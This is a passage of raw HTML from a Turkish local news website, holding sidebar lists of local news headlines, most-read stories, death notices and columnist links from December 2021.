        <img src="https://www.elbistaninsesi.com/images/haberler/2021/12/hem_spor_kulubu_dernegi_baskanligina_selcuk_kayapinar_getirildi_h72268_4badb.jpg" alt="HEM Spor Kulübü Derneği Başkanlığına Selçuk Kayapınar getirildi" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">HEM Spor Kulübü Derneği Başkanlığına Selçuk Kayapınar getirildi</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="https://www.elbistaninsesi.com/guncel/suru-yonetimi-elemani-kursu-tamamlandi-h72267.html" title="Sürü yönetimi elemanı kursu tamamlandı">

        
        <img src="https://www.elbistaninsesi.com/images/haberler/2021/12/suru_yonetimi_elemani_kursu_tamamlandi_h72267_aed57.jpg" alt="Sürü yönetimi elemanı kursu tamamlandı" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Sürü yönetimi elemanı kursu tamamlandı</span>
          </h2>
          
        </div>
        
      </a>
    </div>
      </div>

  <a class="carousel-control left hs-sdch" href="#anamanset" data-slide="prev">&lsaquo;</a>
  <a class="carousel-control right hs-sdch" href="#anamanset" data-slide="next">&rsaquo;</a>

</div>
 </div>
  
    <div class="clearfix galleries">
    <div class="title">
      <span>İlgili Galeriler</span><hr>
    </div>
    <div class="row-fluid">
            <div class="span3">
        <a href="https://www.elbistaninsesi.com/elbistan-tarihi-organizeye-ev-sahipligi-yapti-resimleri,38.html" title="Elbistan, tarihi organizeye ev sahipliği yaptı">
          <img src="https://www.elbistaninsesi.com/images/album/thumbs/DSC_5431.jpg" alt="Elbistan, tarihi organizeye ev sahipliği yaptı" />
          <b>Elbistan, tarihi organizeye ev sahipliği yaptı</b>
        </a>
      </div>
            <div class="span3">
        <a href="https://www.elbistaninsesi.com/donatir-mobilyadan-hediye-yagmuru-resimleri,37.html" title="Donatır Mobilya’dan hediye yağmuru">
          <img src="https://www.elbistaninsesi.com/images/album/thumbs/donatYr_mobilya_cekiliY_1.jpg" alt="Donatır Mobilya’dan hediye yağmuru" />
          <b>Donatır Mobilya’dan hediye yağmuru</b>
        </a>
      </div>
            <div class="span3">
        <a href="https://www.elbistaninsesi.com/otomobilde-yanarak-can-verdiler-resimleri,36.html" title="Otomobilde yanarak can verdiler">
          <img src="https://www.elbistaninsesi.com/images/album/thumbs/DSC_8860.jpg" alt="Otomobilde yanarak can verdiler" />
          <b>Otomobilde yanarak can verdiler</b>
        </a>
      </div>
          </div>
  </div>
  
  <div id="yorumyap" style="margin:0"></div>
  <div class="clearfix keywords"><div class="title">Anahtar Kelimeler:</div><a href="https://www.elbistaninsesi.com/haberleri/Hastaneye+pansuman+gibi+atama" title="Hastaneye Pansuman Gibi Atama haberleri">Hastaneye Pansuman Gibi Atama</a></div>
  
          </div>

                <!-- Sağ Blok -->
        <div id="sidebar" class="sidebar span4">
          
          
  
  
    <!-- ILGILI HABERLER  -->
  <div id="ilgiliHaberler-y">
    <div class="ilgiliHaberler-y-t glyphicons white show_big_thumbnails hs-bgc text-uppercase">İlgili Haberler</div>
        <div class="ilgiliHaber">
      <a href="https://www.elbistaninsesi.com/guncel/elbistanli-guresci-bolge-birincisi-oldu-h72325.html"  title="Elbistanlı güreşçi bölge birincisi oldu">
        <img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2021/12/elbistanli_guresci_bolge_birincisi_oldu_h72325_53658.jpg" alt="Elbistanlı güreşçi bölge birincisi oldu" />
        <span>Elbistanlı güreşçi bölge birincisi oldu</span>
      </a>
    </div>
        <div class="ilgiliHaber">
      <a href="https://www.elbistaninsesi.com/guncel/tuketici-dernekleri-zamli-aldiginiz-urunu-iade-edin-h72324.html"  title="Tüketici Dernekleri: “Zamlı aldığınız ürünü iade edin”">
        <img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2021/12/tuketici_dernekleri_zamli_aldiginiz_urunu_iade_edin_h72324_fabd1.jpg" alt="Tüketici Dernekleri: “Zamlı aldığınız ürünü iade edin”" />
        <span>Tüketici Dernekleri: “Zamlı aldığınız ürünü...</span>
      </a>
    </div>
        <div class="ilgiliHaber">
      <a href="https://www.elbistaninsesi.com/guncel/eksi-20-dereceye-dusen-sogukta-donan-kaz-telef-oldu-h72323.html"  title="Eksi 20 dereceye düşen soğukta donan kaz telef oldu">
        <img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2021/12/eksi_20_dereceye_dusen_sogukta_donan_kaz_telef_oldu_h72323_6226c.jpg" alt="Eksi 20 dereceye düşen soğukta donan kaz telef oldu" />
        <span>Eksi 20 dereceye düşen soğukta donan kaz telef...</span>
      </a>
    </div>
        <div class="ilgiliHaber">
      <a href="https://www.elbistaninsesi.com/guncel/kahramanmaras-iletisim-baskanligindaki-tecrube-kursusunde-h72322.html"  title="Kahramanmaraş, İletişim Başkanlığı’ndaki tecrübe kürsüsünde">
        <img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2021/12/kahramanmaras_iletisim_baskanligindaki_tecrube_kursusunde_h72322_5fc67.jpg" alt="Kahramanmaraş, İletişim Başkanlığı’ndaki tecrübe kürsüsünde" />
        <span>Kahramanmaraş, İletişim Başkanlığı’ndaki...</span>
      </a>
    </div>
        <div class="ilgiliHaber">
      <a href="https://www.elbistaninsesi.com/guncel/kademeli-elektrik-faturasi-uygulamasi-1-ocakta-basliyor-h72321.html"  title="Kademeli elektrik faturası uygulaması 1 Ocak’ta başlıyor">
        <img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2021/12/kademeli_elektrik_faturasi_uygulamasi_1_ocakta_basliyor_h72321_79098.png" alt="Kademeli elektrik faturası uygulaması 1 Ocak’ta başlıyor" />
        <span>Kademeli elektrik faturası uygulaması 1 Ocak’ta...</span>
      </a>
    </div>
        <div class="ilgiliHaber">
      <a href="https://www.elbistaninsesi.com/guncel/ak-parti-yeni-ekonomi-modelini-anlatmak-icin-sahaya-indi-h72320.html"  title="AK Parti yeni ekonomi modelini anlatmak için sahaya indi">
        <img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2021/12/ak_parti_yeni_ekonomi_modelini_anlatmak_icin_sahaya_indi_h72320_372c0.jpg" alt="AK Parti yeni ekonomi modelini anlatmak için sahaya indi" />
        <span>AK Parti yeni ekonomi modelini anlatmak için sahaya...</span>
      </a>
    </div>
        <div class="ilgiliHaber">
      <a href="https://www.elbistaninsesi.com/guncel/500-kisilik-ogrenci-yurdunun-ihale-takvimi-aciklandi-h72318.html"  title="500 kişilik öğrenci yurdunun ihale takvimi açıklandı">
        <img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2021/12/500_kisilik_ogrenci_yurdunun_ihale_takvimi_aciklandi_h72318_bd177.jpg" alt="500 kişilik öğrenci yurdunun ihale takvimi açıklandı" />
        <span>500 kişilik öğrenci yurdunun ihale takvimi açıklandı</span>
      </a>
    </div>
        <div class="ilgiliHaber">
      <a href="https://www.elbistaninsesi.com/guncel/elbistanspor-ilk-yarinin-son-macindan-1-puan-cikardi-h72313.html"  title="Elbistanspor ilk yarının son maçından 1 puan çıkardı">
        <img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2021/12/elbistanspor_ilk_yarinin_son_macindan_1_puan_cikardi_h72313_8c526.jpg" alt="Elbistanspor ilk yarının son maçından 1 puan çıkardı" />
        <span>Elbistanspor ilk yarının son maçından 1 puan çıkardı</span>
      </a>
    </div>
      </div>

  
  <!-- EGAZETE -->
  <div class="egazete">
    <div class="header">
      <h5>E-Gazete</h5>
    </div>
    <div class="content">
            <a href="https://www.elbistaninsesi.com/images/sayfalar/27-Aralık-2021.jpg" title="Elbistanın Sesi - 27.12.2021 Manşeti" target="_blank"><img src="https://www.elbistaninsesi.com/images/sayfalar/thumb_27-Aralık-2021.jpg" alt="Elbistanın Sesi - 27.12.2021 Manşeti" /></a>
           </div>
  </div>

  
  <!-- SOSYAL  -->
  <div class="hs-sosyal clearfix">
      <div class="hs-box hs-facebook">
        <div class="top">
          <div class="icon"><img src="https://www.elbistaninsesi.com/_themes/hs-rush-php/images/icon/fb32.png" alt="Facebook"></div>
          <div class="right">
            <span class="count"><a href="https://facebook.com/elbistaninsesi" class="hs-sdch" target="blank" id="likes"></a></span>
            <span class="text">Beğeni</span>
          </div>
        </div>
        <div class="bottom">
          <a href="https://facebook.com/elbistaninsesi" target="blank" class="hs-sdch" rel="nofollow">Facebook'ta Beğen</a>
        </div>
      </div>
      <div class="hs-box hs-twitter">
        <div class="top">
          <div class="icon"><img src="https://www.elbistaninsesi.com/_themes/hs-rush-php/images/icon/twitter32.png" alt="Twitter"></div>
          <div class="right">
            <span class="count"><a href="https://twitter.com/elbistaninsesi" class="hs-sdch" target="blank" id="followers">100</a></span>
            <span class="text">Takipçi</span>
          </div>
        </div>
        <div class="bottom">
          <a href="https://twitter.com/elbistaninsesi" target="blank" class="hs-sdch" rel="nofollow">Twitter'da Takip Et</a>
        </div>
      </div>

      <div class="hs-box hs-youtube">
          <div class="top">
              <div class="icon"><img src="https://www.elbistaninsesi.com/_themes/hs-rush-php/images/icon/youtube.png" alt="Youtube"></div>
          </div>
          <div class="bottom">
              <a href="" target="blank" class="hs-sdch" rel="nofollow">Youtube Abone Ol</a>
          </div>
      </div>

      <div class="hs-box hs-instagram">
          <div class="top">
              <div class="icon"><img src="https://www.elbistaninsesi.com/_themes/hs-rush-php/images/icon/instagram.png" alt="instagram"></div>
          </div>
          <div class="bottom">
              <a href="" target="blank" class="hs-sdch" rel="nofollow">Instagram Takip</a>
          </div>
      </div>



  </div>

  

  <!-- ENCOKLAR  -->
  <div class="encoklar">
    <div class="accordion">
    	      	<div class="accordion-group">
        	<div class="accordion-heading hs-bgc">
          		<a class="accordion-toggle hs-sdch" data-toggle="collapse" data-parent="#encoklar" href="#collapseOne">
          			<span class="encoklar-icon"><i class="halflings-icon white fire"></i></span><h5>Bu Ay Çok Okunanlar</h5>
				</a>
        	</div>
        	<div id="collapseOne" class="accordion-body collapse in">
          		<div class="accordion-inner">
            		<ul class="en-list">
              		              			<li class="last en-hidden en-visible"><a href="https://www.elbistaninsesi.com/vefatlar/whatsapp-vefat-hatti-h66390.html" title="WHATSAPP VEFAT HATTI" class="en-left"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2021/01/whatsapp_vefat_hatti_h66390_a8338.jpg" alt="WHATSAPP VEFAT HATTI" ></a><div class="en-right"><a href="https://www.elbistaninsesi.com/vefatlar/whatsapp-vefat-hatti-h66390.html" title="" ><span class="en-hit">1.</span> <strong>WHATSAPP VEFAT HATTI</strong> <span class="en-spot en-hidden">VEFAT BİLGİLERİNİZİ AŞAĞIDAKİ NUMARAYA İLETİNİZ. YAYINLIYALIM.</span></a></div></li>
              		              			<li class="en-hidden"><a href="https://www.elbistaninsesi.com/guncel/projektorle-tavsan-avi-pahaliya-patladi-h72124.html" title="Projektörle tavşan avı pahalıya..." class="en-left"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2021/12/projektorle_tavsan_avi_pahaliya_patladi_h72124_ca4ba.jpg" alt="Projektörle tavşan avı pahalıya..." ></a><div class="en-right"><a href="https://www.elbistaninsesi.com/guncel/projektorle-tavsan-avi-pahaliya-patladi-h72124.html" title="" ><span class="en-hit">2.</span> <strong>Projektörle tavşan avı pahalıya...</strong> <span class="en-spot en-hidden">Nurhak’ta projektörle gece tavşan avına çıkan 4 kişi, hem 24 bin...</span></a></div></li>
              		              			<li class="en-hidden"><a href="https://www.elbistaninsesi.com/guncel/esinin-demir-cubukla-vurdugu-ekinozulu-kadin-hayatini-kaybetti-h72296.html" title="Eşinin demir çubukla vurduğu Ekinözülü..." class="en-left"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2021/12/esinin_demir_cubukla_vurdugu_ekinozulu_kadin_hayatini_kaybetti_h72296_3425c.jpg" alt="Eşinin demir çubukla vurduğu Ekinözülü..." ></a><div class="en-right"><a href="https://www.elbistaninsesi.com/guncel/esinin-demir-cubukla-vurdugu-ekinozulu-kadin-hayatini-kaybetti-h72296.html" title="" ><span class="en-hit">3.</span> <strong>Eşinin demir çubukla vurduğu Ekinözülü...</strong> <span class="en-spot en-hidden">Antalya&#039;da demirci ustası olan eşinin demir çubukla başına vurduğu...</span></a></div></li>
              		              			<li class="en-hidden"><a href="https://www.elbistaninsesi.com/guncel/asci-tarafindan-katledilen-ekinozulu-gencle-ilgili-valilikten-h72103.html" title="Aşçı tarafından katledilen Ekinözülü..." class="en-left"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2021/12/asci_tarafindan_katledilen_ekinozulu_gencle_ilgili_valilikten_aciklama_h72103_c8b88.jpg" alt="Aşçı tarafından katledilen Ekinözülü..." ></a><div class="en-right"><a href="https://www.elbistaninsesi.com/guncel/asci-tarafindan-katledilen-ekinozulu-gencle-ilgili-valilikten-h72103.html" title="" ><span class="en-hit">4.</span> <strong>Aşçı tarafından katledilen Ekinözülü...</strong> <span class="en-spot en-hidden">Kaldığı öğrenci yurdunun aşçısı tarafından kafası satırla...</span></a></div></li>
              		              			<li class="en-hidden"><a href="https://www.elbistaninsesi.com/guncel/aksener-bu-harami-duzeni-birlikte-yikacagiz-h72170.html" title="Akşener: Bu harami düzeni birlikte..." class="en-left"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2021/12/aksener_bu_harami_duzeni_birlikte_yikacagiz_h72170_cf324.jpg" alt="Akşener: Bu harami düzeni birlikte..." ></a><div class="en-right"><a href="https://www.elbistaninsesi.com/guncel/aksener-bu-harami-duzeni-birlikte-yikacagiz-h72170.html" title="" ><span class="en-hit">5.</span> <strong>Akşener: “Bu harami düzeni birlikte...</strong> <span class="en-spot en-hidden">İYİ Parti Genel Başkanı Meral Akşener, Elbistan ziyaretinde yaptığı...</span></a></div></li>
              		            		</ul>
          		</div>
        	</div>
      	</div>
              <div class="accordion-group">
        <div class="accordion-heading hs-bgc">
          <a class="accordion-toggle hs-sdch" data-toggle="collapse" data-parent="#encoklar" href="#collapseTwo">
            <span class="encoklar-icon"><i class="halflings-icon white comments"></i></span><h5>Bu Ay Çok Yorumlananlar</h5></a>
        </div>
        <div id="collapseTwo" class="accordion-body collapse in">
          <div class="accordion-inner">
            <ul class="en-list">
                            <li class="en-hidden en-visible"><a href="https://www.elbistaninsesi.com/vefatlar/aytekin-karagenc-65-yasinda-h72156.html" title="Aytekin Karagenç 65 yaşında" class="en-left"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2021/12/aytekin_karagenc_65_yasinda_h72156_885e4.jpg" alt="Aytekin Karagenç 65 yaşında"></a><div class="en-right"><a href="https://www.elbistaninsesi.com/vefatlar/aytekin-karagenc-65-yasinda-h72156.html" title="" ><span class="en-hit">1.</span> <strong>Aytekin Karagenç 65 yaşında</strong> <span class="en-spot en-hidden">Aytekin Karagenç 65 yaşında</span></a></div></li>
                            <li class="en-hidden"><a href="https://www.elbistaninsesi.com/vefatlar/ahmet-hamamci-91-yasinda-h72120.html" title="Ahmet Hamamcı 91 yaşında" class="en-left"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2021/12/ahmet_hamamci_91_yasinda_h72120_a6f71.jpg" alt="Ahmet Hamamcı 91 yaşında"></a><div class="en-right"><a href="https://www.elbistaninsesi.com/vefatlar/ahmet-hamamci-91-yasinda-h72120.html" title="" ><span class="en-hit">2.</span> <strong>Ahmet Hamamcı 91 yaşında</strong> <span class="en-spot en-hidden"></span></a></div></li>
                            <li class="en-hidden"><a href="https://www.elbistaninsesi.com/vefatlar/mehmet-oztoy-101-yasinda-h72242.html" title="Mehmet Öztoy 101 yaşında" class="en-left"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2021/12/mehmet_oztoy_101_yasinda_h72242_62e0b.jpg" alt="Mehmet Öztoy 101 yaşında"></a><div class="en-right"><a href="https://www.elbistaninsesi.com/vefatlar/mehmet-oztoy-101-yasinda-h72242.html" title="" ><span class="en-hit">3.</span> <strong>Mehmet Öztoy 101 yaşında</strong> <span class="en-spot en-hidden"></span></a></div></li>
                            <li class="en-hidden"><a href="https://www.elbistaninsesi.com/vefatlar/mehmet-aydin-65-yasinda-h72189.html" title="Mehmet Aydın 65 yaşında" class="en-left"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2021/12/mehmet_aydin_65_yasinda_h72189_efa95.jpg" alt="Mehmet Aydın 65 yaşında"></a><div class="en-right"><a href="https://www.elbistaninsesi.com/vefatlar/mehmet-aydin-65-yasinda-h72189.html" title="" ><span class="en-hit">4.</span> <strong>Mehmet Aydın 65 yaşında</strong> <span class="en-spot en-hidden"></span></a></div></li>
                            <li class="en-hidden"><a href="https://www.elbistaninsesi.com/vefatlar/mukremin-ilhan-76-yasinda-h72121.html" title="Mükremin İlhan 76 yaşında" class="en-left"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2021/12/mukremin_ilhan_76_yasinda_h72121_2ead7.jpg" alt="Mükremin İlhan 76 yaşında"></a><div class="en-right"><a href="https://www.elbistaninsesi.com/vefatlar/mukremin-ilhan-76-yasinda-h72121.html" title="" ><span class="en-hit">5.</span> <strong>Mükremin İlhan 76 yaşında</strong> <span class="en-spot en-hidden"></span></a></div></li>
                          </ul>
          </div>
        </div>
      </div>
        </div>
  </div>

  
  <!-- YAZARLAR -->
  <div id="syazar" class="hs-yazarlar">
    <div class="header">
      <h5><a href="https://www.elbistaninsesi.com/yazarlar/" title="Yazarlar">Yazarlar</a></h5>
            <a class="control left" href="#" id="syprev"></a>
      <a class="control right" href="#" id="synext"></a>
          </div>
    <div class="content">
      <div class="item">
                  <div class="hs-yazar">
            <a href="https://www.elbistaninsesi.com/kendi-muhasebeniz-makale,6446.html" title="KENDİ MUHASEBENİZ" >
            <div class="hs-yazar-resim pull-right">
                <img src="https://www.elbistaninsesi.com/images/yazarlar/thumbs/yazarlar_koYesi.jpg" alt="Aykut YILDIRIM">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="https://www.elbistaninsesi.com/profil/70/aykut-yildirim" title="Aykut YILDIRIM">Aykut YILDIRIM</a></h4>
              <a href="https://www.elbistaninsesi.com/kendi-muhasebeniz-makale,6446.html" title="KENDİ MUHASEBENİZ" >KENDİ MUHASEBENİZ</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="https://www.elbistaninsesi.com/kisa-kisa-haber-makale,6445.html" title="KISA KISA HABER" >
            <div class="hs-yazar-resim pull-right">
                <img src="https://www.elbistaninsesi.com/images/yazarlar/thumbs/mehmet-gocer_1.jpg" alt="Mehmet Göçer">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="https://www.elbistaninsesi.com/profil/4/mehmet-gocer" title="Mehmet Göçer">Mehmet Göçer</a></h4>
              <a href="https://www.elbistaninsesi.com/kisa-kisa-haber-makale,6445.html" title="KISA KISA HABER" >KISA KISA HABER</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="https://www.elbistaninsesi.com/bugday-tanesi-makale,6444.html" title="BUĞDAY TANESİ" >
            <div class="hs-yazar-resim pull-right">
                <img src="https://www.elbistaninsesi.com/images/yazarlar/thumbs/Nazife-Yetişgen.jpg" alt="Nazife YETİŞGEN">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="https://www.elbistaninsesi.com/profil/103/nazife-yetisgen" title="Nazife YETİŞGEN">Nazife YETİŞGEN</a></h4>
              <a href="https://www.elbistaninsesi.com/bugday-tanesi-makale,6444.html" title="BUĞDAY TANESİ" >BUĞDAY TANESİ</a>
            </div>
          </a>
          </div>
              </div>
      <div class="item">
                <div class="hs-yazar">
            <a href="https://www.elbistaninsesi.com/herkese-dokunan-haller-makale,6443.html" title="HERKESE DOKUNAN HALLER" >
            <div class="hs-yazar-resim pull-right">
                <img src="https://www.elbistaninsesi.com/images/yazarlar/thumbs/m-emin-elagoz_1.jpg" alt="M. Emin ELAGÖZ">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="https://www.elbistaninsesi.com/profil/7/m-emin-elagoz" title="M. Emin ELAGÖZ">M. Emin ELAGÖZ</a></h4>
              <a href="https://www.elbistaninsesi.com/herkese-dokunan-haller-makale,6443.html" title="HERKESE DOKUNAN HALLER" >HERKESE DOKUNAN HALLER</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="https://www.elbistaninsesi.com/0-6-yas-cocuklarin-gelisim-onerileri-4-makale,6442.html" title="0-6 YAŞ ÇOCUKLARIN GELİŞİM ÖNERİLERİ-4" >
            <div class="hs-yazar-resim pull-right">
                <img src="https://www.elbistaninsesi.com/images/yazarlar/thumbs/tuğba.jpg" alt="Tuğba Arıkan">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="https://www.elbistaninsesi.com/profil/101/tugba-arikan" title="Tuğba Arıkan">Tuğba Arıkan</a></h4>
              <a href="https://www.elbistaninsesi.com/0-6-yas-cocuklarin-gelisim-onerileri-4-makale,6442.html" title="0-6 YAŞ ÇOCUKLARIN GELİŞİM ÖNERİLERİ-4" >0-6 YAŞ ÇOCUKLARIN GELİŞİM ÖNERİLERİ-4</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="https://www.elbistaninsesi.com/tecrube-ile-sabit-29-makale,6435.html" title="TEC­RÜ­BE İLE SABİT-29-" >
            <div class="hs-yazar-resim pull-right">
                <img src="https://www.elbistaninsesi.com/images/yazarlar/thumbs/mehmet-gozukara_1.jpg" alt="Mehmet Gözükara">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="https://www.elbistaninsesi.com/profil/13/mehmet-gozukara" title="Mehmet Gözükara">Mehmet Gözükara</a></h4>
              <a href="https://www.elbistaninsesi.com/tecrube-ile-sabit-29-makale,6435.html" title="TEC­RÜ­BE İLE SABİT-29-" >TEC­RÜ­BE İLE SABİT-29-</a>
            </div>
          </a>
          </div>
              </div>
      <div class="item">
                <div class="hs-yazar">
            <a href="https://www.elbistaninsesi.com/albustanda-bir-karye-makale,6432.html" title="ALBUSTANDA BİR KARYE" >
            <div class="hs-yazar-resim pull-right">
                <img src="https://www.elbistaninsesi.com/images/yazarlar/thumbs/me.jpg" alt="İlhan Akar">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="https://www.elbistaninsesi.com/profil/81/ilhan-akar" title="İlhan Akar">İlhan Akar</a></h4>
              <a href="https://www.elbistaninsesi.com/albustanda-bir-karye-makale,6432.html" title="ALBUSTANDA BİR KARYE" >ALBUSTANDA BİR KARYE</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="https://www.elbistaninsesi.com/reisime-makale,6431.html" title="REİSİME" >
            <div class="hs-yazar-resim pull-right">
                <img src="https://www.elbistaninsesi.com/images/yazarlar/thumbs/Yair_arYkan.jpg" alt="Şahin ARIKAN">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="https://www.elbistaninsesi.com/profil/78/sahin-arikan" title="Şahin ARIKAN">Şahin ARIKAN</a></h4>
              <a href="https://www.elbistaninsesi.com/reisime-makale,6431.html" title="REİSİME" >REİSİME</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="https://www.elbistaninsesi.com/olunce-kabrime-gelirsen-yeter-makale,6430.html" title="ÖLÜN­CE KABRİME GELİRSEN YETER" >
            <div class="hs-yazar-resim pull-right">
                <img src="https://www.elbistaninsesi.com/images/yazarlar/thumbs/Mahir_BaYpYnar.jpg" alt="Mahir Başpınar">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="https://www.elbistaninsesi.com/profil/57/mahir-baspinar" title="Mahir Başpınar">Mahir Başpınar</a></h4>
              <a href="https://www.elbistaninsesi.com/olunce-kabrime-gelirsen-yeter-makale,6430.html" title="ÖLÜN­CE KABRİME GELİRSEN YETER" >ÖLÜN­CE KABRİME GELİRSEN YETER</a>
            </div>
          </a>
          </div>
              </div>
      <div class="item">
                <div class="hs-yazar">
            <a href="https://www.elbistaninsesi.com/nerde-yaziyor-makale,6429.html" title="Nerde ya­zı­yor" >
            <div class="hs-yazar-resim pull-right">
                <img src="https://www.elbistaninsesi.com/images/yazarlar/thumbs/Nadir-Adbay_499_1.jpg" alt="Mehmet Ayaz">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="https://www.elbistaninsesi.com/profil/6/mehmet-ayaz" title="Mehmet Ayaz">Mehmet Ayaz</a></h4>
              <a href="https://www.elbistaninsesi.com/nerde-yaziyor-makale,6429.html" title="Nerde ya­zı­yor" >Nerde ya­zı­yor</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="https://www.elbistaninsesi.com/mutlu-mesut-yasiyorduk-makale,6428.html" title="MUTLU MESUT YA­ŞI­YOR­DUK" >
            <div class="hs-yazar-resim pull-right">
                <img src="https://www.elbistaninsesi.com/images/yazarlar/thumbs/Ramazan-Pamuk_910_1.jpg" alt="Ramazan Pamuk">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="https://www.elbistaninsesi.com/profil/23/ramazan-pamuk" title="Ramazan Pamuk">Ramazan Pamuk</a></h4>
              <a href="https://www.elbistaninsesi.com/mutlu-mesut-yasiyorduk-makale,6428.html" title="MUTLU MESUT YA­ŞI­YOR­DUK" >MUTLU MESUT YA­ŞI­YOR­DUK</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="https://www.elbistaninsesi.com/borclu-makale,6427.html" title="BORÇ­LU" >
            <div class="hs-yazar-resim pull-right">
                <img src="https://www.elbistaninsesi.com/images/yazarlar/thumbs/Yemliha-Gurlek_688_1.jpg" alt="Yemliha Gürlek">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="https://www.elbistaninsesi.com/profil/31/yemliha-gurlek" title="Yemliha Gürlek">Yemliha Gürlek</a></h4>
              <a href="https://www.elbistaninsesi.com/borclu-makale,6427.html" title="BORÇ­LU" >BORÇ­LU</a>
            </div>
          </a>
          </div>
              </div>
      <div class="item">
                <div class="hs-yazar">
            <a href="https://www.elbistaninsesi.com/alcaklarin-deyyuslarin-hormetine1-makale,6422.html" title="Alçakların, deyyusların... hörmetine[1]" >
            <div class="hs-yazar-resim pull-right">
                <img src="https://www.elbistaninsesi.com/images/yazarlar/thumbs/1.jpg" alt="Arif  Bilgin">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="https://www.elbistaninsesi.com/profil/1/arif-bilgin" title="Arif  Bilgin">Arif  Bilgin</a></h4>
              <a href="https://www.elbistaninsesi.com/alcaklarin-deyyuslarin-hormetine1-makale,6422.html" title="Alçakların, deyyusların... hörmetine[1]" >Alçakların, deyyusların... hörmetine[1]</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="https://www.elbistaninsesi.com/ahlakin-destek-ve-direnci-kac-makale,6418.html" title="Ahlakın destek ve direnci kaç?" >
            <div class="hs-yazar-resim pull-right">
                <img src="https://www.elbistaninsesi.com/images/yazarlar/thumbs/vesikalYk_a_g.jpeg" alt="Ahmet Göçer">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="https://www.elbistaninsesi.com/profil/3/ahmet-gocer" title="Ahmet Göçer">Ahmet Göçer</a></h4>
              <a href="https://www.elbistaninsesi.com/ahlakin-destek-ve-direnci-kac-makale,6418.html" title="Ahlakın destek ve direnci kaç?" >Ahlakın destek ve direnci kaç?</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="https://www.elbistaninsesi.com/kaderi-insanlar-mi-yazar-yazilan-kaderi-mi-yasar-makale,6396.html" title="KADERİ İNSANLAR MI YAZAR, YAZILAN KADERİ Mİ YAŞAR ?" >
            <div class="hs-yazar-resim pull-right">
                <img src="https://www.elbistaninsesi.com/images/yazarlar/thumbs/kitap1.jpg" alt="Sevda Küçük">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="https://www.elbistaninsesi.com/profil/62/sevda-kucuk" title="Sevda Küçük">Sevda Küçük</a></h4>
              <a href="https://www.elbistaninsesi.com/kaderi-insanlar-mi-yazar-yazilan-kaderi-mi-yasar-makale,6396.html" title="KADERİ İNSANLAR MI YAZAR, YAZILAN KADERİ Mİ YAŞAR ?" >KADERİ İNSANLAR MI YAZAR, YAZILAN KADERİ Mİ YAŞAR ?</a>
            </div>
          </a>
          </div>
              </div>
      <div class="item">
                <div class="hs-yazar">
            <a href="https://www.elbistaninsesi.com/mangalda-pisen-et-makale,6394.html" title="MANGALDA PİŞEN ET!!!" >
            <div class="hs-yazar-resim pull-right">
                <img src="https://www.elbistaninsesi.com/images/yazarlar/thumbs/MANGALDA-PİŞEN-ET.jpg" alt="Veli Yüce">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="https://www.elbistaninsesi.com/profil/102/veli-yuce" title="Veli Yüce">Veli Yüce</a></h4>
              <a href="https://www.elbistaninsesi.com/mangalda-pisen-et-makale,6394.html" title="MANGALDA PİŞEN ET!!!" >MANGALDA PİŞEN ET!!!</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
